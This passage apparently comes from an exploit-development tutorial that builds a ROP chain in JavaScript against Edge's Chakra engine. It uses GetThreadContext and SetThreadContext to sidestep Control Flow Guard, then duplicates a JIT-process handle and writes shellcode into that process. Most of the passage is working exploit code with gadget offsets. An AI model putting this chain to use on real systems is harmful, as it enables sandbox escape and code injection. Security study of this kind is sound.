write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future mov qword [rax+0x20], rcx gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
next();

// LPCONTEXT lpContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
next();                                                                      
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// Call KERNELBASE!GetThreadContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x72d10, kernelbaseHigh); // KERNELBASE!GetThreadContext address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!GetThreadContext)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!GetThreadContext - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

Using the same method of setting a breakpoint on jmp rax, we can examine the first gadget in our GetThreadContext ROP chain.

We start off our GetThreadContext ROP chain by preserving the address of our previous VirtualAlloc allocation (which is still in RAX) into the .data section of kernelbase.dll.

The next thing we will do is also preserve VirtualAlloc_allocation + 0x30 in the .data section of kernelbase.dll. We have already pointed out that CONTEXT.ContextFlags is located at CONTEXT + 0x30 and, since our VirtualAlloc allocation is acting as our CONTEXT structure, we can think of this as saving our ContextFlags address within the .data section of kernelbase.dll so we can write our needed 0x10001f value to it later. Since our original base VirtualAlloc allocation was already in RAX, we can simply add 0x30 to it (using the add rax, 0x10 gadgets) and perform another write.

At this point we have successfully saved our CONTEXT address and our CONTEXT.ContextFlags address in memory for persistent storage, for the duration of the exploit.

The next thing we will do is update CONTEXT.ContextFlags. Since we have already preserved the address of ContextFlags in memory (.data section of kernelbase.dll), we can pop the storage address into a register, dereference it to recover the ContextFlags address, and write our value there. The first pop rax gadget below is, again, only there to satisfy a residual instruction in our dereference gadget (mov qword [rax+0x20], rcx), which requires RAX to hold a valid, writable address.
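To make the data flow of this gadget sequence easier to follow, here is a minimal sketch that models memory as a `Map` and replays the gadgets as plain JavaScript statements. The addresses (`CONTEXT_BUFFER`, `CONTEXT_FLAGS_PTR`, `SCRATCH`) are hypothetical placeholders standing in for the VirtualAlloc allocation, kernelbase+0x21a110, and chakra+0x72E128; this is a toy model, not part of the exploit.

```javascript
// Toy model of the gadget sequence that writes CONTEXT_ALL into CONTEXT.ContextFlags.
// Every address here is a made-up placeholder, not a real module address.
const mem = new Map();                        // address (BigInt) -> 64-bit value (BigInt)
const regs = { rax: 0n, rcx: 0n };

const CONTEXT_BUFFER    = 0x20000000n;        // stand-in for the VirtualAlloc allocation
const CONTEXT_FLAGS_PTR = 0x10000110n;        // stand-in for kernelbase+0x21a110
const SCRATCH           = 0x30000128n;        // stand-in for chakra+0x72E128 (writable)
const CONTEXT_ALL       = 0x10001Fn;

// Earlier in the chain, the address of ContextFlags (CONTEXT + 0x30) was stored.
mem.set(CONTEXT_FLAGS_PTR, CONTEXT_BUFFER + 0x30n);

// pop rcx ; ret  -> RCX = storage slot
regs.rcx = CONTEXT_FLAGS_PTR;
// pop rax ; ret  -> RAX = writable scratch pointer for the next gadget's side effect
regs.rax = SCRATCH;
// mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
regs.rcx = mem.get(regs.rcx);                 // RCX = address of ContextFlags
mem.set(regs.rax + 0x20n, regs.rcx);          // harmless residual write
// pop rax ; ret  -> RAX = value to write
regs.rax = CONTEXT_ALL;
// mov qword [rcx], rax ; ret
mem.set(regs.rcx, regs.rax);

const flags = mem.get(CONTEXT_BUFFER + 0x30n);
console.log("ContextFlags = 0x" + flags.toString(16));
```

The only point of the model is that two dereference steps are involved: one to recover the ContextFlags address from storage, and one to write through it.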

If we actually parse our VirtualAlloc allocation as a CONTEXT structure, we can see we properly set ContextFlags.

At this point our call is in the following state:

VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL		// CONTEXT_ALL = 0x10001f

GetThreadContext(
	-
	-
);
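As a quick sanity check on the 0x10001f value, the sketch below rebuilds CONTEXT_ALL from the individual x64 flag values defined in winnt.h. The constant names mirror the SDK header; the snippet itself is only an illustration.

```javascript
// x64 CONTEXT flag values as defined in winnt.h.
const CONTEXT_AMD64           = 0x00100000;
const CONTEXT_CONTROL         = CONTEXT_AMD64 | 0x01;
const CONTEXT_INTEGER         = CONTEXT_AMD64 | 0x02;
const CONTEXT_SEGMENTS        = CONTEXT_AMD64 | 0x04;
const CONTEXT_FLOATING_POINT  = CONTEXT_AMD64 | 0x08;
const CONTEXT_DEBUG_REGISTERS = CONTEXT_AMD64 | 0x10;

// CONTEXT_ALL requests every register group at once.
const CONTEXT_ALL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS |
                    CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS;

console.log("CONTEXT_ALL = 0x" + CONTEXT_ALL.toString(16));
```

Requesting CONTEXT_ALL means both the control registers (RIP, RSP) and the integer registers are filled in by GetThreadContext.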

Let’s now step through more of the ROP chain and start out by retrieving our thread’s handle from the .data section of kernelbase.dll.

At this point our call is in the following state:

VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL		// CONTEXT_ALL = 0x10001f

GetThreadContext(
	threadHandle,					// A handle to the thread we want to retrieve a CONTEXT structure for (our thread we created via CreateRemoteThread)
	-
);

For our last parameter, lpContext, we just need to pass in the pointer returned earlier from VirtualAlloc (which we stored in the .data section of kernelbase.dll). Again, we use the same mov rdx, [rdx+0x8] gadget we have seen throughout this blog post. Instead of directly popping the address which points to our VirtualAlloc allocation, we pass in that address - 0x8 so that, when the dereference happens, the +0x8 and the -0x8 cancel each other out. This is done with the following ROP gadgets:

// LPCONTEXT lpContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
next();                                                                      
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

Our call, after the above gadgets, is now ready to go as such:

VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL		// CONTEXT_ALL = 0x10001f

GetThreadContext(
	threadHandle,					// A handle to the thread we want to retrieve a CONTEXT structure for (our thread we created via CreateRemoteThread)
	addressof(VirtualAlloc_buffer)			// The buffer to receive the CONTEXT structure
);
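The -0x8 adjustment used for lpContext can be sketched in isolation. In the model below, `STORAGE_SLOT` stands in for kernelbase+0x21a108 and `ALLOCATION` for the pointer returned by VirtualAlloc; both values, and the helper name `movRdxFromRdxPlus8`, are hypothetical.

```javascript
// Toy model of the "mov rdx, qword [rdx+0x08]" gadget and the -0x8 compensation.
const mem = new Map();                      // address (BigInt) -> 64-bit value (BigInt)

const STORAGE_SLOT = 0x10000108n;           // stand-in for kernelbase+0x21a108
const ALLOCATION   = 0x20000000n;           // stand-in for the VirtualAlloc allocation
mem.set(STORAGE_SLOT, ALLOCATION);

// The gadget always reads 8 bytes past whatever RDX points to.
function movRdxFromRdxPlus8(rdx) {
    return mem.get(rdx + 0x8n);
}

// pop rdx ; ret  -> we deliberately pop (slot - 0x8) ...
const popped = STORAGE_SLOT - 0x8n;
// ... so the gadget's built-in +0x8 lands exactly on the slot.
const rdx = movRdxFromRdxPlus8(popped);

console.log("RDX = 0x" + rdx.toString(16));
```

Popping the slot address itself would instead read the neighboring qword at slot + 0x8, which is why the chain subtracts 0x8 up front.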

After executing the call with pt, we can see we successfully leaked the context of the remote thread, including its stack pointer!

However, if we take a look at the RIP member, which should be a pointer to our ret gadget (theoretically), we can see it is not.

Instead, it points to RtlUserThreadStart. This makes total sense, as our thread was created in a suspended state and hasn't actually executed yet. So, the instruction pointer of this thread is still on the start function. If we actually debug the JIT process and manually resume this thread (using Process Hacker, for instance), we can see execution actually fails (sorry for the WinDbg classic screenshots):

Remember earlier when I talked about the nuances of setting the entry point directly with our call to CreateRemoteThread? This is Control Flow Guard kicking in and exposing this nuance. When we set the routine for CreateRemoteThread to execute, we actually did so with a ret ROP gadget. As we know, most functions end with a ret instruction, so we told our program we wanted to call into the end of a function. When performing a call, Control Flow Guard checks whether the call target is a valid function. It does this through a bitmap of all known “valid call targets”. CFG checks whether you are calling into known targets at 0x10-byte boundaries, as functions should be aligned in this manner. Since we called into the end of a function, our target was not a known function start on a 0x10-byte boundary and, thus, CFG kills the process because it has detected an invalid call target (and rightly so, as we were maliciously trying to call into the middle of a function). The way we can get around this is to use a call to SetThreadContext to manually update RIP so that it directly executes our ROP gadget after resuming, instead of asking CreateRemoteThread to perform a call instruction to it (which CFG will check). This will require a few extra steps, but we are nearing the end now.
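The check described above can be approximated with a very simplified model: a target passes only if it is a known function start on a 0x10-byte boundary. The real CFG bitmap encoding is more involved than this, and the addresses and the `isValidCallTarget` helper below are purely hypothetical.

```javascript
// Simplified model of a CFG-style check (NOT the real bitmap encoding).
// Hypothetical function entry points that the loader registered as valid targets.
const validTargets = new Set([0x180001000n, 0x180001040n]);

function isValidCallTarget(addr) {
    const aligned = (addr & 0xFn) === 0n;      // must sit on a 0x10-byte boundary
    return aligned && validTargets.has(addr);  // and must be a known function start
}

const functionStart = 0x180001000n;            // start of a (made-up) function
const retGadget     = 0x18000103Fn;            // its final ret instruction

console.log("function start allowed:", isValidCallTarget(functionStart));
console.log("ret gadget allowed:    ", isValidCallTarget(retGadget));
```

Under this model, an indirect call to the ret gadget is rejected, while writing the same address into RIP through SetThreadContext never goes through the check at all.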

Manipulating RIP and Preserving RSP

The next thing we are going to do is to preserve the location of RIP and RSP from our captured thread context. We will first start by locating RSP, which is at an offset of 0x98 within a CONTEXT structure. We will persistently store this in the .data section of kernelbase.dll.
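For reference, the offsets involved can be illustrated by parsing a raw CONTEXT-sized buffer with a `DataView`. The 0x30 and 0x98 offsets are the ones used in this post; the 0xF8 offset for Rip and the 0x4D0 structure size come from the x64 CONTEXT layout in winnt.h. The sample register values are fabricated, and `parseContext` is a hypothetical helper.

```javascript
// Offsets within the x64 CONTEXT structure.
const CONTEXT_FLAGS_OFFSET = 0x30;   // DWORD ContextFlags
const CONTEXT_RSP_OFFSET   = 0x98;   // DWORD64 Rsp
const CONTEXT_RIP_OFFSET   = 0xF8;   // DWORD64 Rip

// Pull the fields we care about out of a raw CONTEXT buffer (little-endian).
function parseContext(buffer) {
    const view = new DataView(buffer);
    return {
        contextFlags: view.getUint32(CONTEXT_FLAGS_OFFSET, true),
        rsp: view.getBigUint64(CONTEXT_RSP_OFFSET, true),
        rip: view.getBigUint64(CONTEXT_RIP_OFFSET, true),
    };
}

// Build a fake CONTEXT with made-up values to exercise the parser.
const raw = new ArrayBuffer(0x4D0);  // sizeof(CONTEXT) on x64
const fill = new DataView(raw);
fill.setUint32(CONTEXT_FLAGS_OFFSET, 0x10001F, true);
fill.setBigUint64(CONTEXT_RSP_OFFSET, 0x000000A1B2C3F000n, true);
fill.setBigUint64(CONTEXT_RIP_OFFSET, 0x00007FFC12345670n, true);

const ctx = parseContext(raw);
console.log("Rsp = 0x" + ctx.rsp.toString(16), "Rip = 0x" + ctx.rip.toString(16));
```

In the exploit itself, the equivalent of `ctx.rsp` is what gets saved to the .data section, and the qword at offset 0xF8 is what gets overwritten before SetThreadContext is called.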

We can use the following ROP snippet (including previous chains) to store CONTEXT.Rsp and to update CONTEXT.Rip directly. Remember, when we set RIP directly instead of asking the thread to perform a call to our gadget (which CFG checks), we can “bypass the CFG check” and, thus, simply return back to the stack.

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtualAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx decide where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the address returned by VirtualAllocEx in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
